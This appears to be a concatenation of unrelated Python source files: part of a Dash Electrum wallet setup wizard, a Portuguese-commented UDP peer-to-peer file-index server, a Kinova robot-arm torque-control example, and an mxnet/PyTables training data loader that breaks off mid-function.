checked_index=default_choice_idx)
if not hide_choices:
vbox.addLayout(clayout.layout())
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next, hw_info=None):
self.save_button.show()
title = (_('Hardware Wallet Public Key') if hw_info else
_('Master Public Key'))
msg = ' '.join([
_("Here is your {} public key.").format(hw_info) if hw_info else
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, title)
return None
def init_network(self, network: 'Network'):
message = _("Dash Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Dash Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
self.config.set_key('auto_connect', network.auto_connect, True)
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
backup_warning_label.setVisible(cw.m != cw.n)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
backup_warning_label.setVisible(cw.m != cw.n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
vbox.addSpacing(2 * char_width_in_lineedit())
backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
"you should include the master public key for each cosigner "
"in all of your backups."))
vbox.addWidget(backup_warning_label)
on_n(2)
on_m(2)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
server.py
|
import time
import copy
import json
import socket
import threading
# running locally
from message import Message
class Servidor:
HOST = "127.0.0.1"
PORT = 10098
ALIVE_PORT = PORT + 1
SERVER = (HOST, PORT)
BUFFERSIZE = 1024
BROAD_CAST_TIME_INTERVAL = 30 # Tempo entre cada requisição mandada aos peers (segundos)
ALIVE_TIMEOUT = 3 # Tempo de espera pela resposta do peer na requisição ALIVE (segundos)
def __init__(self):
# Utilizada para comunicar com o peer, requisições JOIN, SEARCH, LEAVE e UPDATE
self.UDPServerSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.UDPServerSocket.bind((self.HOST, self.PORT))
# Utilizada especificadamente para comunicação da requisição ALIVE
self.UDPAliveSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.UDPAliveSocket.bind((self.HOST, self.ALIVE_PORT))
self.peers = {} # Estrutura de dados que vai guardar os peers
def _receive(self):
"""
Ouve por requisições UDP dos peers. Cria uma thread para cada requisição.
"""
while True:
try:
data, peer_udp = self.UDPServerSocket.recvfrom(self.BUFFERSIZE)
recv_msg = json.loads(data.decode('utf-8')) # Transforma json em dict
# Criar uma thread para cada requisição de um cliente
thread = threading.Thread(target=self._handle_request, args=(recv_msg,peer_udp))
thread.start() # Inicializa a Thread
thread.join() # Espera a thread terminar
except Exception as e:
print(e)
self.UDPServerSocket.close()
break
def _handle_request(self, recv_msg, peer_udp):
"""
Dispacha a requisição para o método apropriado com as informações necesárias.
"""
address, ports = recv_msg["sender"] # Peer que fez a requisição
peer_tcp = (address, ports[0])
peer_udp = (address, ports[1])
peer_udp_alive = (address, ports[2])
msg_type = recv_msg["msg_type"] # Tipo de requisição
content = recv_msg["content"] # Conteúdo da requisição
if msg_type == "JOIN":
return self._handle_join(peer_tcp, peer_udp, peer_udp_alive, content)
elif msg_type == "UPDATE":
return self._handle_update(peer_tcp, peer_udp, peer_udp_alive, content)
elif msg_type == "SEARCH":
return self._handle_search(peer_tcp, peer_udp, content)
elif msg_type == "LEAVE":
return self._handle_leave(peer_tcp, peer_udp, peer_udp_alive)
else:
msg = Message(content="Comando Invalido - Desconhecido pelo servidor.", msg_type="UNKNOWN", sender=self.SERVER)
self.UDPServerSocket.sendto(msg.to_json("utf-8"), peer_udp)
def _handle_join(self, peer_tcp, peer_udp, peer_udp_alive, content):
"""
Grava peer na estrutura de dados do servidor somente caso não esteja conectado.
"""
file_lst = content.strip() # Retira possíveis espaços em branco do começo e final da string
peer = (peer_tcp[0], (peer_tcp[1], peer_udp[1], peer_udp_alive[1]))
if peer not in self.peers:
self.peers[peer] = file_lst.split() # Grava o peer no servidor
print(f"Peer [{peer_tcp[0]}]:[{peer_tcp[1]}] adicionado com arquivos {file_lst}")
msg = Message(content=None, msg_type="JOIN_OK", sender=self.SERVER)
self.UDPServerSocket.sendto(msg.to_json("utf-8"), peer_udp)
else:
msg = Message(content="Você já está conectado\n", msg_type="JOIN_OK", sender=self.SERVER)
self.UDPServerSocket.sendto(msg.to_json("utf-8"), peer_udp)
# print(f"Peer [{peer_tcp[0]}]:{peer_tcp[1]} já está conectado.")
def _handle_update(self, peer_tcp, peer_udp, peer_udp_alive, new_file):
"""
Adiona arquivo na lista de arquivos de um peer que se encontra na rede.
"""
peer = (peer_tcp[0], (peer_tcp[1], peer_udp[1], peer_udp_alive[1]))
update_file = new_file.strip()
if peer in self.peers:
if update_file not in self.peers[peer]: # Fazemos o update somente no caso de ser um arquivo novo
self.peers[peer].append(update_file) # Retira possíveis espaços em branco do começo e final da string e adiciona na estrutura
msg = Message(content=None, msg_type="UPDATE_OK", sender=self.SERVER)
self.UDPServerSocket.sendto(msg.to_json("utf-8"), peer_udp)
def _handle_search(self, peer_tcp, peer_udp, content):
"""
Encontra quais peers tem o arquivo solicitado.
"""
filename = content.strip() # Retira espaços em branco do começo e final da string
print(f"Peer [{peer_tcp[0]}]:[{peer_tcp[1]}] solicitou arquivo {filename}")
has_peers = [f"{peer[0]}:{peer[1][0]}" for peer in self.peers if (filename in self.peers[peer]) and (peer_tcp != (peer[0],peer[1][0]))]
msg = Message(content="[" + " ".join(has_peers) + "]",
msg_type="SEARCH",
sender=self.SERVER,
extra_info=filename)
self.UDPServerSocket.sendto(msg.to_json("utf-8"), peer_udp)
def _handle_leave(self, peer_tcp, peer_udp, peer_udp_alive):
"""
Remove as informações do peer da rede.
"""
peer = (peer_tcp[0], (peer_tcp[1], peer_udp[1], peer_udp_alive[1]))
if peer in self.peers:
self.peers.pop(peer) # Retira o peer do servidor
msg = Message(content=None, msg_type="LEAVE_OK", sender=self.SERVER)
self.UDPServerSocket.sendto(msg.to_json("utf-8"), peer_udp)
def broadcast(self):
"""
Envia requisição ALIVE para todos os peers a cada 'BROAD_CAST_TIME_INTERVAL' segundos.
"""
msg = Message(content=None, msg_type="ALIVE", sender=self.SERVER, extra_info=(self.ALIVE_PORT))
thread_alive = threading.Timer(self.BROAD_CAST_TIME_INTERVAL, self._broadcast_alive, args=[msg,]) # Inicializa uma Thread a cada 'BROAD_CAST_TIME_INTERVAL' segundos
start_time = time.time()
thread_alive.start() # Inicializa a Thread
thread_alive.join() # Espera thread_alive terminar
# print("--- %s seconds ---" % (time.time() - start_time))
self.broadcast()
def _broadcast_alive(self,msg):
"""
Cria uma thread para cada peer da rede
"""
tmp_copy = copy.deepcopy(self.peers) # Utilizo uma cópia para não remover um peer da rede enquanto à percorro.
for peer in tmp_copy:
thread = threading.Thread(target=self._handle_alive, args=[msg, peer])
thread.start()
thread.join()
def _handle_alive(self, msg, peer):
"""
Pergunta se o peer está vivo pela porta udp_alive
"""
try:
adress, ports = peer
self.UDPAliveSocket.sendto(msg.to_json("utf-8"), (adress, ports[2]))
self.UDPAliveSocket.settimeout(self.ALIVE_TIMEOUT)
_ = self.UDPAliveSocket.recvfrom(self.BUFFERSIZE)
self.UDPAliveSocket.settimeout(None)
except socket.timeout:
print(f"Peer [{peer[0]}]:[{peer[1][0]}] morto. Eliminando seus arquivos [{' '.join(self.peers[peer])}]")
self.peers.pop(peer)
if __name__ == "__main__":
server = Servidor()
# Responsável por responder todas requisições UDP dos peers
listening_thread = threading.Thread(target=server._receive)
# Responsável por perguntar aos peers se estão vivos
alive_thread = threading.Thread(target=server.broadcast)
listening_thread.start()
alive_thread.start()
|
01-torque_control_cyclic.py
|
#! /usr/bin/env python3
###
# KINOVA (R) KORTEX (TM)
#
# Copyright (c) 2019 Kinova inc. All rights reserved.
#
# This software may be modified and distributed
# under the terms of the BSD 3-Clause license.
#
# Refer to the LICENSE file for details.
#
###
###
# * DESCRIPTION OF CURRENT EXAMPLE:
# ===============================
# This example works as a simili-haptic demo.
#
# The last actuator, the small one holding the interconnect, acts as a torque sensing device commanding the first actuator.
# The first actuator, the big one on the base, is controlled in torque and its position is sent as a command to the last one.
#
# The script can be launched through command line with python3: python torqueControl_example.py
# The PC should be connected through ethernet with the arm. Default IP address 192.168.1.10 is used as arm address.
#
# 1- Connection with the base:
# 1- A TCP session is started on port 10000 for most API calls. Refresh is at 25ms on this port.
# 2- A UDP session is started on port 10001 for BaseCyclic calls. Refresh is at 1ms on this port only.
# 2- Initialization
# 1- First frame is built based on arm feedback to ensure continuity
# 2- First actuator torque command is set as well
# 3- Base is set in low-level servoing
# 4- First frame is sent
# 3- First actuator is switched to torque mode
# 3- Cyclic thread is running at 1ms
# 1- Torque command to first actuator is set to a multiple of last actuator torque measure minus its initial value to
# avoid an initial offset error
# 2- Position command to last actuator equals first actuator position minus initial delta
#
# 4- On keyboard interrupt, example stops
# 1- Cyclic thread is stopped
# 2- First actuator is set back to position control
# 3- Base is set in single level servoing (default)
###
import sys
import os
from kortex_api.autogen.client_stubs.ActuatorConfigClientRpc import ActuatorConfigClient
from kortex_api.autogen.client_stubs.ActuatorCyclicClientRpc import ActuatorCyclicClient
from kortex_api.autogen.client_stubs.BaseClientRpc import BaseClient
from kortex_api.autogen.client_stubs.BaseCyclicClientRpc import BaseCyclicClient
from kortex_api.autogen.client_stubs.DeviceConfigClientRpc import DeviceConfigClient
from kortex_api.autogen.client_stubs.DeviceManagerClientRpc import DeviceManagerClient
from kortex_api.autogen.messages import Session_pb2, ActuatorConfig_pb2, Base_pb2, BaseCyclic_pb2, Common_pb2
from kortex_api.RouterClient import RouterClientSendOptions
import time
import sys
import threading
class TorqueExample:
def __init__(self, router, router_real_time):
# Maximum allowed waiting time during actions (in seconds)
self.ACTION_TIMEOUT_DURATION = 20
self.torque_amplification = 2.0 # Torque measure on last actuator is sent as a command to first actuator
# Create required services
device_manager = DeviceManagerClient(router)
self.actuator_config = ActuatorConfigClient(router)
self.base = BaseClient(router)
self.base_cyclic = BaseCyclicClient(router_real_time)
self.base_command = BaseCyclic_pb2.Command()
self.base_feedback = BaseCyclic_pb2.Feedback()
self.base_custom_data = BaseCyclic_pb2.CustomData()
# Detect all devices
device_handles = device_manager.ReadAllDevices()
self.actuator_count = self.base.GetActuatorCount().count
# Only actuators are relevant for this example
for handle in device_handles.device_handle:
if handle.device_type == Common_pb2.BIG_ACTUATOR or handle.device_type == Common_pb2.SMALL_ACTUATOR:
self.base_command.actuators.add()
self.base_feedback.actuators.add()
# Change send option to reduce max timeout at 3ms
self.sendOption = RouterClientSendOptions()
self.sendOption.andForget = False
self.sendOption.delay_ms = 0
self.sendOption.timeout_ms = 3
self.cyclic_t_end = 30 #Total duration of the thread in seconds. 0 means infinite.
self.cyclic_thread = {}
self.kill_the_thread = False
self.already_stopped = False
self.cyclic_running = False
# Create closure to set an event after an END or an ABORT
def check_for_end_or_abort(self, e):
"""Return a closure checking for END or ABORT notifications
Arguments:
e -- event to signal when the action is completed
(will be set when an END or ABORT occurs)
"""
def check(notification, e = e):
print("EVENT : " + \
Base_pb2.ActionEvent.Name(notification.action_event))
if notification.action_event == Base_pb2.ACTION_END \
or notification.action_event == Base_pb2.ACTION_ABORT:
e.set()
return check
def MoveToHomePosition(self):
# Make sure the arm is in Single Level Servoing mode
base_servo_mode = Base_pb2.ServoingModeInformation()
base_servo_mode.servoing_mode = Base_pb2.SINGLE_LEVEL_SERVOING
self.base.SetServoingMode(base_servo_mode)
# Move arm to ready position
print("Moving the arm to a safe position")
action_type = Base_pb2.RequestedActionType()
action_type.action_type = Base_pb2.REACH_JOINT_ANGLES
action_list = self.base.ReadAllActions(action_type)
action_handle = None
for action in action_list.action_list:
if action.name == "Home":
action_handle = action.handle
if action_handle == None:
print("Can't reach safe position. Exiting")
return False
e = threading.Event()
notification_handle = self.base.OnNotificationActionTopic(
self.check_for_end_or_abort(e),
Base_pb2.NotificationOptions()
)
self.base.ExecuteActionFromReference(action_handle)
print("Waiting for movement to finish ...")
finished = e.wait(self.ACTION_TIMEOUT_DURATION)
self.base.Unsubscribe(notification_handle)
if finished:
print("Cartesian movement completed")
else:
print("Timeout on action notification wait")
return finished
return True
def InitCyclic(self, sampling_time_cyclic, t_end, print_stats):
if self.cyclic_running:
return True
# Move to Home position first
if not self.MoveToHomePosition():
return False
print("Init Cyclic")
sys.stdout.flush()
base_feedback = self.SendCallWithRetry(self.base_cyclic.RefreshFeedback, 3)
if base_feedback:
self.base_feedback = base_feedback
# Init command frame
for x in range(self.actuator_count):
self.base_command.actuators[x].flags = 1 # servoing
self.base_command.actuators[x].position = self.base_feedback.actuators[x].position
# First actuator is going to be controlled in torque
# To ensure continuity, torque command is set to measure
self.base_command.actuators[0].torque_joint = self.base_feedback.actuators[0].torque
# Set arm in LOW_LEVEL_SERVOING
base_servo_mode = Base_pb2.ServoingModeInformation()
base_servo_mode.servoing_mode = Base_pb2.LOW_LEVEL_SERVOING
self.base.SetServoingMode(base_servo_mode)
# Send first frame
self.base_feedback = self.base_cyclic.Refresh(self.base_command, 0, self.sendOption)
# Set first actuator in torque mode now that the command is equal to measure
control_mode_message = ActuatorConfig_pb2.ControlModeInformation()
control_mode_message.control_mode = ActuatorConfig_pb2.ControlMode.Value('TORQUE')
device_id = 1 # first actuator as id = 1
self.SendCallWithRetry(self.actuator_config.SetControlMode, 3, control_mode_message, device_id)
# Init cyclic thread
self.cyclic_t_end = t_end
self.cyclic_thread = threading.Thread(target=self.RunCyclic, args=(sampling_time_cyclic, print_stats))
self.cyclic_thread.daemon = True
self.cyclic_thread.start()
return True
else:
print("InitCyclic: failed to communicate")
return False
def RunCyclic(self, t_sample, print_stats):
self.cyclic_running = True
print("Run Cyclic")
sys.stdout.flush()
cyclic_count = 0 # Counts refresh
stats_count = 0 # Counts stats prints
failed_cyclic_count = 0 # Count communication timeouts
# Initial delta between first and last actuator
init_delta_position = self.base_feedback.actuators[0].position - self.base_feedback.actuators[self.actuator_count - 1].position
# Initial first and last actuator torques; avoids unexpected movement due to torque offsets
init_last_torque = self.base_feedback.actuators[self.actuator_count - 1].torque
init_first_torque = -self.base_feedback.actuators[0].torque # Torque measure is reversed compared to actuator direction
t_now = time.time()
t_cyclic = t_now # cyclic time
t_stats = t_now # print time
t_init = t_now # init time
print("Running torque control example for {} seconds".format(self.cyclic_t_end))
while not self.kill_the_thread:
t_now = time.time()
# Cyclic Refresh
if (t_now - t_cyclic) >= t_sample:
t_cyclic = t_now
# Position command to first actuator is set to measured one to avoid following error to trigger
# Bonus: When doing this instead of disabling the following error, if communication is lost and first
# actuator continue to move under torque command, resulting position error with command will
# trigger a following error and switch back the actuator in position command to hold its position
self.base_command.actuators[0].position = self.base_feedback.actuators[0].position
# First actuator torque command is set to last actuator torque measure times an amplification
self.base_command.actuators[0].torque_joint = init_first_torque + \
self.torque_amplification * (self.base_feedback.actuators[self.actuator_count - 1].torque - init_last_torque)
# First actuator position is sent as a command to last actuator
self.base_command.actuators[self.actuator_count - 1].position = self.base_feedback.actuators[0].position - init_delta_position
# Incrementing identifier ensure actuators can reject out of time frames
self.base_command.frame_id += 1
if self.base_command.frame_id > 65535:
self.base_command.frame_id = 0
for i in range(self.actuator_count):
self.base_command.actuators[i].command_id = self.base_command.frame_id
# Frame is sent
try:
self.base_feedback = self.base_cyclic.Refresh(self.base_command, 0, self.sendOption)
except:
failed_cyclic_count = failed_cyclic_count + 1
cyclic_count = cyclic_count + 1
# Stats Print
if print_stats and ((t_now - t_stats) > 1):
t_stats = t_now
stats_count = stats_count + 1
cyclic_count = 0
failed_cyclic_count = 0
sys.stdout.flush()
if self.cyclic_t_end != 0 and (t_now - t_init > self.cyclic_t_end):
print("Cyclic Finished")
sys.stdout.flush()
break
self.cyclic_running = False
return True
def StopCyclic(self):
print ("Stopping the cyclic and putting the arm back in position mode...")
if self.already_stopped:
return
# Kill the thread first
if self.cyclic_running:
self.kill_the_thread = True
self.cyclic_thread.join()
# Set first actuator back in position mode
control_mode_message = ActuatorConfig_pb2.ControlModeInformation()
control_mode_message.control_mode = ActuatorConfig_pb2.ControlMode.Value('POSITION')
device_id = 1 # first actuator has id = 1
self.SendCallWithRetry(self.actuator_config.SetControlMode, 3, control_mode_message, device_id)
base_servo_mode = Base_pb2.ServoingModeInformation()
base_servo_mode.servoing_mode = Base_pb2.SINGLE_LEVEL_SERVOING
self.base.SetServoingMode(base_servo_mode)
self.cyclic_t_end = 0.1
self.already_stopped = True
print('Clean Exit')
@staticmethod
def SendCallWithRetry(call, retry, *args):
i = 0
arg_out = []
while i < retry:
try:
arg_out = call(*args)
break
except:
i = i + 1
continue
if i == retry:
print("Failed to communicate")
return arg_out
def main():
# Import the utilities helper module
import argparse
sys.path.insert(0, os.path.join(os.path.dirname(__file__), ".."))
import utilities
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("--cyclic_time", type=float, help="delay, in seconds, between cylic control call", default=0.001)
parser.add_argument("--duration", type=int, help="example duration, in seconds (0 means infinite)", default=30)
parser.add_argument("--print_stats", default=True, help="print stats in command line or not (0 to disable)", type=lambda x: (str(x).lower() not in ['false', '0', 'no']))
args = utilities.parseConnectionArguments(parser)
# Create connection to the device and get the router
with utilities.DeviceConnection.createTcpConnection(args) as router:
with utilities.DeviceConnection.createUdpConnection(args) as router_real_time:
example = TorqueExample(router, router_real_time)
success = example.InitCyclic(args.cyclic_time, args.duration, args.print_stats)
if success:
while example.cyclic_running:
try:
time.sleep(0.5)
except KeyboardInterrupt:
break
example.StopCyclic()
return 0 if success else 1
if __name__ == "__main__":
exit(main())
|
data.py
|
from __future__ import print_function
import numpy as np
import mxnet as mx
import multiprocessing
import time
import logging
import tables
tables.set_blosc_max_threads(4)
def add_data_args(parser):
data = parser.add_argument_group('Data', 'the input data')
data.add_argument('--data-config', type=str, help='the python file for data format')
data.add_argument('--data-train', type=str, help='the training data')
# data.add_argument('--data-val', type=str, help='the validation data')
data.add_argument('--train-val-split', type=float, help='fraction of files used for training')
data.add_argument('--data-test', type=str, help='the test data')
data.add_argument('--data-example', type=str, help='the example data')
data.add_argument('--dryrun', action="store_true", default=False, help='Run over a small exmaple file.')
data.add_argument('--data-names', type=str, help='the data names')
data.add_argument('--label-names', type=str, help='the label names')
data.add_argument('--weight-names', type=str, help='the training data')
# data.add_argument('--num-classes', type=int, help='the number of classes')
data.add_argument('--num-examples', type=int, help='the number of training examples')
data.add_argument('--syn-data', action="store_true", default=False, help='Generate dummy data on the fly.')
data.add_argument('--dataloader-nworkers', type=int, default=2, help='the number of threads used for data loader.')
data.add_argument('--dataloader-qsize', type=int, default=256, help='the queue size for data loader.')
data.add_argument('--dataloader-weight-scale', type=float, default=1, help='the weight scale for data loader.')
data.add_argument('--dataloader-max-resample', type=int, default=10, help='max times to repeat the sampling.')
return data
class DataFormat(object):
def __init__(self, train_groups, train_vars, label_var, wgtvar, obs_vars=[], extra_label_vars=[], pad_params=None, pad_dest_vars=[], pad_src_var=None, pad_constant=None, pad_random_range=None, random_augment_vars=None, random_augment_scale=None, sort_by=None, point_mode=None, filename=None, plotting_mode=False, train_var_range=None):
self.train_groups = train_groups # list
self.train_vars = train_vars # dict
self.sort_by = sort_by # dict {v_group:{'var':x, 'descend':False}}
self.label_var = label_var
self.wgtvar = wgtvar # set to None if not using weights
self.obs_vars = obs_vars # list
self.extra_label_vars = extra_label_vars # list
self.point_mode = point_mode
self.pad_params = pad_params
if pad_params is None:
self.pad_params = {v_group:{
'vars':pad_dest_vars, # list
'src':pad_src_var, # str
'constant':pad_constant, # float
'random':pad_random_range, # list or tuple of 2 floats
} for v_group in train_groups}
else:
for v_group in train_groups:
if v_group not in self.pad_params:
self.pad_params[v_group] = {'src':None, 'vars':[]}
if pad_params is not None and pad_src_var is not None:
logging.debug('Padding info:\n ' + str(self.pad_params))
self.random_augment_vars = random_augment_vars # list
self.random_augment_scale = random_augment_scale # float
self._set_range(plotting_mode, train_var_range)
self._parse_file(filename)
def _set_range(self, plotting_mode, train_var_range):
# weight/var range
self.WEIGHT_MIN = 0.
self.WEIGHT_MAX = 1.
if not plotting_mode:
if train_var_range is None:
self.VAR_MIN = -5.
self.VAR_MAX = 5.
else:
self.VAR_MIN, self.VAR_MAX = train_var_range
else:
self.VAR_MIN = -1e99
self.VAR_MAX = 1e99
@staticmethod
def nevts(filename, label_var='label'):
with tables.open_file(filename) as f:
# return getattr(f.root, f.root.__members__[0]).shape[0]
return getattr(f.root, label_var).shape[0]
@staticmethod
def nwgtsum(filename, weight_vars='weight,class_weight'):
wgt_vars = weight_vars.replace(' ', '').split(',')
assert len(wgt_vars) > 0
with tables.open_file(filename) as f:
return np.sum(np.prod([getattr(f.root, w) for w in wgt_vars], axis=0))
@staticmethod
def num_classes(filename, label_var='label'):
with tables.open_file(filename) as f:
try:
return getattr(f.root, label_var).shape[1]
except IndexError:
return getattr(f.root, label_var)[:].max()
def _parse_file(self, filename):
self.train_groups_shapes = {}
with tables.open_file(filename) as f:
self.num_classes = self.num_classes(filename, self.label_var)
if getattr(f.root, self.label_var).title:
self.class_labels = getattr(f.root, self.label_var).title.split(',')
else:
self.class_labels = [self.label_var]
for v_group in self.train_groups:
n_channels = len(self.train_vars[v_group])
a = getattr(f.root, self.train_vars[v_group][0])
if a.ndim == 3:
# (n, W, H)
width, height = int(a.shape[1]), int(a.shape[2])
elif a.ndim == 2:
# (n, W)
width, height = int(a.shape[1]), 1
elif a.ndim == 1:
# (n,)
width, height = 1, 1
else:
raise RuntimeError
self.train_groups_shapes[v_group] = (n_channels, width, height)
if self.point_mode == 'NPC':
self.train_groups_shapes[v_group] = (width, n_channels)
elif self.point_mode == 'NCP':
self.train_groups_shapes[v_group] = (n_channels, width)
class PyTableEnqueuer(object):
"""Builds a queue out of a data generator.
see, e.g., https://github.com/fchollet/keras/blob/master/keras/engine/training.py
# Arguments
generator: a generator function which endlessly yields data
pickle_safe: use multiprocessing if True, otherwise threading
"""
def __init__(self, filelist, data_format, batch_size, workers=4, q_size=20, shuffle=True, predict_mode=False, fetch_size=100000, up_sample=False, weight_scale=1, max_resample=20):
self._filelist = filelist
self._data_format = data_format
self._batch_size = batch_size
self._shuffle = shuffle
self._predict_mode = predict_mode
self._fetch_size = (fetch_size // batch_size + 1) * batch_size
self._up_sample = up_sample
self._weight_scale = weight_scale
self._max_resample = max_resample
self._workers = workers
self._q_size = q_size
self._lock = multiprocessing.Lock()
self._counter = None # how many processes are running
self._threads = []
self._stop_event = None
self.queue = None
self._file_indices = None
self._idx = None # position of the index for next file
def data_generator_task(self, ifile):
if self._stop_event.is_set():
# do nothing if the queue has been stopped (e.g., due to exceptions)
return
with self._lock:
# increase counter by 1
self._counter.value += 1
try:
fbegin = 0
with tables.open_file(self._filelist[ifile]) as f:
nevts = getattr(f.root, f.root.__members__[0]).shape[0]
while fbegin < nevts:
fend = fbegin + self._fetch_size
# --------- Read from files ----------
# features
X_fetch = {}
for v_group in self._data_format.train_groups:
pad_param = self._data_format.pad_params[v_group]
# update variable ordering if needed
if self._data_format.sort_by and self._data_format.sort_by[v_group]:
if pad_param['src'] is not None:
raise NotImplemented('Cannot do random pad and sorting at the same time now -- to be implemented')
ref_a = getattr(f.root, self._data_format.sort_by[v_group]['var'])[fbegin:fend]
len_a = getattr(f.root, self._data_format.sort_by[v_group]['length_var'])[fbegin:fend]
for i in range(len_a.shape[0]):
ref_a[i, int(len_a[i]):] = -np.inf if self._data_format.sort_by[v_group]['descend'] else np.inf
if ref_a.ndim != 2:
# shape should be (num_samples, num_particles)
raise NotImplemented('Cannot sort variable group %s'%v_group)
# https://stackoverflow.com/questions/10921893/numpy-sorting-a-multidimensional-array-by-a-multidimensional-array
if self._data_format.sort_by[v_group]['descend']:
sorting_indices = np.argsort(-ref_a, axis=1)
else:
sorting_indices = np.argsort(ref_a, axis=1)
X_group = [getattr(f.root, v_name)[fbegin:fend][np.arange(ref_a.shape[0])[:, np.newaxis], sorting_indices]
for v_name in self._data_format.train_vars[v_group]]
else:
X_group = []
pad_mask_a = None if pad_param['src'] is None else getattr(f.root, pad_param['src'])[fbegin:fend] == 0
for v_name in self._data_format.train_vars[v_group]:
a = getattr(f.root, v_name)[fbegin:fend]
if v_name in pad_param['vars']:
if pad_mask_a is None:
raise RuntimeError('Padding `src` is not set for group %s!' % v_group)
if pad_param.get('constant', None) is not None:
a[pad_mask_a] = pad_param['constant']
elif pad_param.get('random', None) is not None:
a_rand = np.random.uniform(low=pad_param['random'][0], high=pad_param['random'][1], size=a.shape)
a[pad_mask_a] = a_rand[pad_mask_a]
else:
raise RuntimeError('Neither `constant` nor `random` is set for padding!')
if not self._predict_mode and self._data_format.random_augment_vars is not None and v_name in self._data_format.random_augment_vars:
a *= np.random.normal(loc=1, scale=self._data_format.random_augment_scale, size=a.shape)
X_group.append(a)
shape = (-1,) + self._data_format.train_groups_shapes[v_group] # (n, C, W, H), use -1 because end can go out of range
if X_group[0].ndim == 3:
# shape=(n, W, H): e.g., 2D image
assert len(X_group) == 1
x_arr = X_group[0]
elif X_group[0].ndim < 3:
# shape=(n, W) if ndim=2: (e.g., track list)
# shape=(n,) if ndim=1: (glovar var)
if self._data_format.point_mode == 'NPC':
x_arr = np.stack(X_group, axis=-1)
else:
x_arr = np.stack(X_group, axis=1)
else:
raise NotImplemented
# if seq_order == 'channels_last':
# x_arr = x_arr.transpose((0, 2, 1))
X_fetch[v_group] = np.clip(x_arr, self._data_format.VAR_MIN, self._data_format.VAR_MAX).reshape(shape)
# logging.debug(' -- v_group=%s, fetch_array.shape=%s, reshape=%s' % (v_group, str(X_group[0].shape), str(shape)))
# labels
y_fetch = getattr(f.root, self._data_format.label_var)[fbegin:fend]
# observers
Z_fetch = None
if self._predict_mode:
Z_fetch = np.stack([getattr(f.root, v_name)[fbegin:fend] for v_name in self._data_format.obs_vars], axis=1)
# extra labels
ext_fetch = None
if self._data_format.extra_label_vars:
ext_fetch = np.stack([getattr(f.root, v_name)[fbegin:fend] for v_name in self._data_format.extra_label_vars], axis=1)
# weights
W_fetch = None
if not self._predict_mode and self._data_format.wgtvar:
w_vars = self._data_format.wgtvar.replace(' ', '').split(',')
wgt = getattr(f.root, w_vars[0])[fbegin:fend]
for idx in range(1, len(w_vars)):
wgt *= getattr(f.root, w_vars[idx])[fbegin:fend]
W_fetch = wgt
fbegin += self._fetch_size
# --------- process weight, shuffle ----------
n_fetched = len(y_fetch)
# sampling the array according to the weights (require weight<1)
all_indices = np.arange(n_fetched)
keep_indices = None
if W_fetch is not None:
randwgt = np.random.uniform(low=0, high=self._weight_scale, size=n_fetched)
keep_flags = randwgt < W_fetch
if not self._up_sample:
keep_indices = all_indices[keep_flags]
else:
keep_indices = [all_indices[keep_flags]]
n_scale = n_fetched // max(1, len(keep_indices[0]))
if n_scale > self._max_resample:
if ifile == 0 and fbegin == self._fetch_size:
logging.debug('n_scale=%d is larger than the max value (%d). Setting to %d' % (n_scale, self._max_resample, self._max_resample))
n_scale = self._max_resample
# print(n_scale)
for _ in range(n_scale - 1):
randwgt = np.random.uniform(size=n_fetched)
keep_indices.append(all_indices[randwgt < W_fetch])
keep_indices = np.concatenate(keep_indices)
